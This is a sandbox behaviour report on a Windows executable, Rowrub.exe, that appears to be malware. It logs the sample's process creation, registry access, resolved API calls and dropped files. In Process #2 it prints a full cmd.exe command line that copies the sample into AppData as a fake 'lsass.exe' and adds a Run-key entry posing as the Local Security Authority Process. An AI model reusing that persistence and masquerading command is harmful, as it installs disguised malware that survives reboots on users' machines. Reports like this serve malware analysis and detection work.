Rowrub.exe
Windows Exe (x86-32)
Created at 2019-06-07T08:39:00
Monitored Processes
Behavior Information - Grouped by Category
Process #1: rowrub.exe
462
0
| Information | Value |
|---|---|
| ID | #1 |
| File Name | c:\users\fd1hvy\desktop\rowrub.exe |
| Command Line | "C:\Users\FD1HVy\Desktop\Rowrub.exe" |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:00:33, Reason: Analysis Target |
| Unmonitor | End Time: 00:01:14, Reason: Self Terminated |
| Monitor Duration | 00:00:41 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xe00 |
| Parent PID | 0x860 (c:\windows\explorer.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
DC4
0x
368
0x
CF8
0x
AF0
0x
DBC
0x
B10
0x
490
0x
A24
0x
EE8
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| rowrub.exe | 0x00400000 | 0x00481FFF | Relevant Image | - | 32-bit | - |
|
|
|
| buffer | 0x00560000 | 0x00561FFF | First Execution | - | 32-bit | 0x0056172B, 0x005604F4 |
|
|
|
| rowrub.exe | 0x00400000 | 0x00481FFF | Process Termination | - | 32-bit | - |
|
|
|
Dropped Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| C:\Users\FD1HVy\AppData\Local\Temp\76E69905.ghost | 1 bytes |
MD5:
93b885adfe0da089cdf634904fd59f71
SHA1: 5ba93c9db0cff93f52b521d7420e43f6eda2784f SHA256: 6e340b9cffb37a989ca544e6bb780a2c78901d3fb33738768511a30617afa01d SSDeep: 3:: |
|
|
Host Behavior
File (6)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\FD1HVy\AppData\Local\Temp\76E69905.ghost | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | C:\Users\FD1HVy\AppData\Local\Temp\76E69905.ghost | size = 1 |
|
1 | |
| Delete | C:\Users\FD1HVy\AppData\Local\Temp\76E69905.ghost | - |
|
1 |
Registry (80)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Borland\Locales | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Borland\Locales | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Borland\Delphi\Locales | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Ghost | - |
|
77 |
Process (3)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\WINDOWS\system32\cmd.exe | os_pid = 0xd0c, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Users\FD1HVy\AppData\Roaming\Microsoft\Windows\lsass.exe | show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\WINDOWS\system32\cmd.exe | show_window = SW_HIDE |
|
1 |
Module (264)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | oleaut32.dll | base_address = 0x75bb0000 |
|
2 | |
| Load | advapi32.dll | base_address = 0x761b0000 |
|
2 | |
| Load | user32.dll | base_address = 0x74b70000 |
|
2 | |
| Load | kernel32.dll | base_address = 0x75e90000 |
|
4 | |
| Load | mpr.dll | base_address = 0x744d0000 |
|
1 | |
| Load | shell32.dll | base_address = 0x76480000 |
|
3 | |
| Load | wininet.dll | base_address = 0x73e80000 |
|
1 | |
| Load | C:\Users\FD1HVy\Desktop\Rowrub.ENU | base_address = 0x0 |
|
1 | |
| Load | C:\Users\FD1HVy\Desktop\Rowrub.EN | base_address = 0x0 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75e90000 |
|
29 | |
| Get Handle | c:\users\fd1hvy\desktop\rowrub.exe | base_address = 0x400000 |
|
1 | |
| Get Handle | c:\windows\syswow64\oleaut32.dll | base_address = 0x75bb0000 |
|
1 | |
| Get Filename | - | process_name = c:\users\fd1hvy\desktop\rowrub.exe, file_name_orig = C:\Users\FD1HVy\Desktop\Rowrub.exe, size = 260 |
|
1 | |
| Get Filename | c:\users\fd1hvy\desktop\rowrub.exe | process_name = c:\users\fd1hvy\desktop\rowrub.exe, file_name_orig = C:\Users\FD1HVy\Desktop\Rowrub.exe, size = 261 |
|
1 | |
| Get Filename | - | process_name = c:\users\fd1hvy\desktop\rowrub.exe, file_name_orig = C:\Users\FD1HVy\Desktop\Rowrub.exe, size = 261 |
|
1 | |
| Get Filename | C:\Users\FD1HVy\Desktop\Rowrub.EN | process_name = c:\users\fd1hvy\desktop\rowrub.exe, file_name_orig = C:\Users\FD1HVy\Desktop\Rowrub.exe, size = 261 |
|
2 | |
| Get Filename | C:\Users\FD1HVy\Desktop\Rowrub.EN | process_name = c:\users\fd1hvy\desktop\rowrub.exe, file_name_orig = C:\Users\FD1HVy\Desktop\Rowrub.exe, size = 522 |
|
3 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x75ea4ae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75ea4b20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75ea4b40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x75ea4b00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x77c129e0 |
|
9 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x77c11ec0 |
|
17 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75efebb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75ea5960 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = SysFreeString, address_out = 0x75bcb920 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = SysReAllocStringLen, address_out = 0x75bd1500 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = SysAllocStringLen, address_out = 0x75bcb7e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExA, address_out = 0x761cf020 |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExA, address_out = 0x761cf210 |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x761ced60 |
|
2 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetKeyboardType, address_out = 0x74be8d80 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DestroyWindow, address_out = 0x74ba3160 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadStringA, address_out = 0x74b8d7b0 |
|
2 | |
| Get Address | c:\windows\syswow64\user32.dll | function = MessageBoxA, address_out = 0x74bdd740 |
|
2 | |
| Get Address | c:\windows\syswow64\user32.dll | function = CharNextA, address_out = 0x74b8bf60 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75ea4ca0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x75ea6760 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualFree, address_out = 0x75ea69d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualAlloc, address_out = 0x75ea6970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount, address_out = 0x75efdd50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75ea5da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75ea8820 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InterlockedDecrement, address_out = 0x75ea73c0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InterlockedIncrement, address_out = 0x75ea7420 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualQuery, address_out = 0x75ea6a70 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x75ea6b10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75ea5c40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenA, address_out = 0x75ea6c50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcpynA, address_out = 0x75ea6c10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExA, address_out = 0x75ea5aa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetThreadLocale, address_out = 0x75ea5600 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoA, address_out = 0x75ee28e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75ea51b0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleA, address_out = 0x75ea50b0 |
|
3 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameA, address_out = 0x75ea5070 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoA, address_out = 0x75ea5020 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineA, address_out = 0x75ea4cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibrary, address_out = 0x75ea4c40 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindFirstFileA, address_out = 0x75efedb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindClose, address_out = 0x75efed70 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x75ea3cb0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77c16390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75ea46b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75eff180 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x75ea68d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75ea7c10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RaiseException, address_out = 0x75ea5e20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x75ea5330 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75ea6870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75ea6850 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75ea5b20 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = TranslateMessage, address_out = 0x74b9f900 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = PeekMessageA, address_out = 0x74b887a0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = MsgWaitForMultipleObjects, address_out = 0x74b9eca0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSystemMetrics, address_out = 0x74b9ddc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DispatchMessageA, address_out = 0x74b8fd80 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = CharNextW, address_out = 0x74ba1130 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = CharLowerBuffW, address_out = 0x74b934a0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = CharLowerBuffA, address_out = 0x74be75b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = CharToOemA, address_out = 0x74bdf020 |
|
1 | |
| Get Address | c:\windows\syswow64\mpr.dll | function = WNetOpenEnumA, address_out = 0x744dd140 |
|
1 | |
| Get Address | c:\windows\syswow64\mpr.dll | function = WNetEnumResourceA, address_out = 0x744dc6d0 |
|
1 | |
| Get Address | c:\windows\syswow64\mpr.dll | function = WNetCloseEnum, address_out = 0x744d2640 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75efeca0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointer, address_out = 0x75eff120 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileAttributesW, address_out = 0x75eff100 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x75efec50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x75eff0e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ResumeThread, address_out = 0x75ea6380 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ResetEvent, address_out = 0x75efec40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x75eff090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MoveFileW, address_out = 0x75ede500 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77bfb250 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSection, address_out = 0x77c0af20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GlobalUnlock, address_out = 0x75ee44e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GlobalReAlloc, address_out = 0x75ee3f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GlobalHandle, address_out = 0x75ee4420 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GlobalLock, address_out = 0x75ee42f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GlobalFree, address_out = 0x75ea1ee0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GlobalAlloc, address_out = 0x75ea5750 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersionExA, address_out = 0x75ea56d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDefaultLangID, address_out = 0x75ea53d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75ea5090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocalTime, address_out = 0x75ea5060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75ea5010 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFullPathNameA, address_out = 0x75efef90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetExitCodeThread, address_out = 0x75ea4ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentVariableW, address_out = 0x75ea4fb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x75ea4f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeA, address_out = 0x75efeec0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDiskFreeSpaceA, address_out = 0x75efee80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatA, address_out = 0x75ea76e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75efea10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x75ea4cc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75ea4d10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InterlockedExchange, address_out = 0x75ea73e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageA, address_out = 0x75ea4bc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindNextFileW, address_out = 0x75efee40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindFirstFileW, address_out = 0x75efedf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FileTimeToLocalFileTime, address_out = 0x75efed60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FileTimeToDosDateTime, address_out = 0x75ee1eb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumCalendarInfoA, address_out = 0x75ebc0d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x77bfb2d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x75efed40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77bdfb90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x75ea4610 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75efed10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileA, address_out = 0x75efed00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventA, address_out = 0x75efeb00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringA, address_out = 0x75ea4410 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75efeab0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExA, address_out = 0x761cffc0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyExA, address_out = 0x761cf560 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x761cefb0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueA, address_out = 0x761c8b30 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x761cffa0 |
|
1 | |
| Get Address | c:\windows\syswow64\shell32.dll | function = ShellExecuteW, address_out = 0x765e42e0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = SafeArrayPtrOfIndex, address_out = 0x75bd6670 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = SafeArrayGetUBound, address_out = 0x75bd5460 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = SafeArrayGetLBound, address_out = 0x75bd5ea0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = SafeArrayCreate, address_out = 0x75bd0340 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VariantChangeType, address_out = 0x75bca5e0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VariantCopy, address_out = 0x75be9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VariantClear, address_out = 0x75be9db0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VariantInit, address_out = 0x75be9de0 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = InternetReadFile, address_out = 0x73fb3a70 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = InternetOpenA, address_out = 0x73f9f1a0 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = InternetConnectA, address_out = 0x7407e5b0 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = InternetCloseHandle, address_out = 0x73f8d000 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = HttpSendRequestA, address_out = 0x7401dd00 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = HttpOpenRequestA, address_out = 0x7409dba0 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = HttpAddRequestHeadersA, address_out = 0x73ff62f0 |
|
1 | |
| Get Address | c:\windows\syswow64\shell32.dll | function = SHGetSpecialFolderLocation, address_out = 0x765e3790 |
|
1 | |
| Get Address | c:\windows\syswow64\shell32.dll | function = SHGetPathFromIDListW, address_out = 0x7658bda0 |
|
1 | |
| Get Address | c:\windows\syswow64\shell32.dll | function = SHGetMalloc, address_out = 0x765edf80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDiskFreeSpaceExA, address_out = 0x75efee90 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VariantChangeTypeEx, address_out = 0x75bca610 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarNeg, address_out = 0x75c152c0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarNot, address_out = 0x75c16560 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarAdd, address_out = 0x75bed610 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarSub, address_out = 0x75bee3e0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarMul, address_out = 0x75bedb10 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarDiv, address_out = 0x75c15800 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarIdiv, address_out = 0x75c161a0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarMod, address_out = 0x75c16400 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarAnd, address_out = 0x75be3200 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarOr, address_out = 0x75c16610 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarXor, address_out = 0x75c167b0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarCmp, address_out = 0x75bd60b0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarI4FromStr, address_out = 0x75bd6ec0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarR4FromStr, address_out = 0x75be3010 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarR8FromStr, address_out = 0x75be3630 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarDateFromStr, address_out = 0x75bd8b90 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarCyFromStr, address_out = 0x75bc2d90 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBoolFromStr, address_out = 0x75bd48f0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBstrFromCy, address_out = 0x75bd7f50 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBstrFromDate, address_out = 0x75bd89c0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBstrFromBool, address_out = 0x75bd48a0 |
|
1 |
Keyboard (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = 0, result_out = 4 |
|
1 |
System (99)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = 1769 milliseconds (1.769 seconds) |
|
7 | |
| Sleep | duration = 100 milliseconds (0.100 seconds) |
|
5 | |
| Sleep | duration = 10 milliseconds (0.010 seconds) |
|
77 | |
| Get Time | type = Performance Ctr, time = 15179146789 |
|
1 | |
| Get Info | type = Operating System |
|
3 | |
| Get Info | type = Operating System |
|
1 | |
| Get Info | type = Hardware Information |
|
2 | |
| Get Info | type = Windows Directory, result_out = C:\WINDOWS |
|
2 | |
| Get Info | type = System Directory, result_out = C:\WINDOWS\system32 |
|
1 |
Environment (6)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = TEMP, result_out = C:\Users\FD1HVy\AppData\Local\Temp |
|
2 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\FD1HVy\AppData\Roaming |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe |
|
2 |
Process #2: cmd.exe
86
0
| Information | Value |
|---|---|
| ID | #2 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\WINDOWS\system32\cmd.exe" /e:on /c md "C:\Users\FD1HVy\AppData\Roaming\Microsoft\Windows" & copy "C:\Users\FD1HVy\Desktop\Rowrub.exe" "C:\Users\FD1HVy\AppData\Roaming\Microsoft\Windows\lsass.exe" & reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Local Security Authority Process /t REG_SZ /F /D "\"C:\Users\FD1HVy\AppData\Roaming\Microsoft\Windows\lsass.exe\" *" |
| Initial Working Directory | C:\WINDOWS\system32\ |
| Monitor | Start Time: 00:01:01, Reason: Child Process |
| Unmonitor | End Time: 00:01:09, Reason: Self Terminated |
| Monitor Duration | 00:00:08 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd0c |
| Parent PID | 0xe00 (c:\users\fd1hvy\desktop\rowrub.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
9B0
0x
6CC
|
Dropped Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| C:\Users\FD1HVy\Desktop\Rowrub.exe | 468.75 KB |
MD5:
e29f7f907c96782adbf18d790086ec08
SHA1: e96e73365daa4afe8c75ab5848353897a3847077 SHA256: be9dd97e5b63ca55c3acdeef15e8da65424d7c074effb386a1e443a85fec9d94 SSDeep: 6144:w9NSyAp5ATCbR/3tV9Qk1TyRhAPlfTgh+1n4KMERJUg78Cth3VRDvt6BDDHCqCFw:KhTg2gG/S9EYn/Ug7F37tuDDdX |
|
|
Host Behavior
File (37)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\FD1HVy\Desktop\Rowrub.exe | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create Directory | C:\Users\FD1HVy\AppData\Roaming\Microsoft\Windows | - |
|
1 | |
| Get Info | C:\WINDOWS\system32 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32 | type = file_attributes |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Get Info | C:\Users\FD1HVy\Desktop\Rowrub.exe | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | C:\Users\FD1HVy\AppData\Roaming\Microsoft\Windows\lsass.exe | type = file_attributes |
|
2 | |
| Get Info | C:\Users\FD1HVy\AppData\Roaming\Microsoft\Windows\lsass.exe | type = file_attributes |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
11 | |
| Open | STD_INPUT_HANDLE | - |
|
6 | |
| Open | STD_ERROR_HANDLE | - |
|
3 | |
| Open | - | - |
|
2 | |
| Copy | C:\Users\FD1HVy\AppData\Roaming\Microsoft\Windows\lsass.exe | source_filename = C:\Users\FD1HVy\Desktop\Rowrub.exe |
|
1 | |
| Read | - | size = 512, size_out = 512 |
|
1 | |
| Write | STD_ERROR_HANDLE | size = 90 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 27 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 104, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
